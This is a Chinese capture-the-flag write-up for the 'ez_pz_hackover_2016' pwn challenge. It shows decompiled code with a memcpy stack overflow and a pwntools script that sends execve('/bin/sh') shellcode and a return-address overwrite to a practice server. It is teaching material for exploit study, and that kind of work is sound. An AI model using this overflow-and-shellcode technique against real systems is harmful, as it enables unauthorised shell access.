ez_pz_hackover_2016
Arch: i386-32-little
RELRO: Full RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE (0x8048000)
RWX: Has RWX segments
32位,保护全关
int chall()
{
size_t v0; // eax
int result; // eax
char s[1024]; // [esp+Ch] [ebp-40Ch] BYREF
_BYTE *v3; // [esp+40Ch] [ebp-Ch]
printf("Yippie, lets crash: %p\n", s);
printf("Whats your name?\n");
printf("> ");
fgets(s, 1023, stdin);
v0 = strlen(s);
v3 = memchr(s, 10, v0);
if ( v3 )
*v3 = 0;
printf("\nWelcome %s!\n", s);
result = strcmp(s, "crashme");
if ( !result )
return vuln((char)s, 0x400u);
return result;
}
这里不存在漏洞点
void *__cdecl vuln(char src, size_t n)
{
char dest[50]; // [esp+6h] [ebp-32h] BYREF
return memcpy(dest, &src, n);
}
漏洞点在这里,通过上面输入的数据传进这里并执行栈
思路
我们需要计算不同函数栈的距离
需要绕过strcmp和memchr,\x00均可绕过,答案就呼之欲出了,
调好偏移,使返回地址指向shellcode就可以getshell了
参考文章来源:https://www.toymoban.com/news/detail-714457.html
from pwn import*
from Yapack import *
r,elf=rec("node4.buuoj.cn",27018,"./pwn",10)
context(os='linux', arch='i386',log_level='debug')
#debug('b *0x8048600')
sc=b'\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80'
leak=get_addr_int()-(0x1c)
pl=b'crashme\x00'+b'a'*(0x12)+p64(leak)+sc
sla(b'> ',pl)
ia()
文章来源地址https://www.toymoban.com/news/detail-714457.html
到了这里,关于ez_pz_hackover_2016的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!
![[SWPUCTF 2022 新生赛]ez_ez_php](https://imgs.yssmx.com/Uploads/2024/02/658447-1.png)
![[FSCTF 2023]EZ_eval](https://imgs.yssmx.com/Uploads/2024/02/711356-1.png)
![[SWPUCTF 2021 新生赛]ez_unserialize](https://imgs.yssmx.com/Uploads/2024/02/446144-1.png)
![NSS [UUCTF 2022 新生赛]ez_upload](https://imgs.yssmx.com/Uploads/2024/02/638865-1.png)
![[GFCTF 2021]ez_calc day3](https://imgs.yssmx.com/Uploads/2024/02/485799-1.png)
![[GDOUCTF 2023]<ez_ze> SSTI 过滤数字 大括号{等](https://imgs.yssmx.com/Uploads/2024/02/736902-1.png)
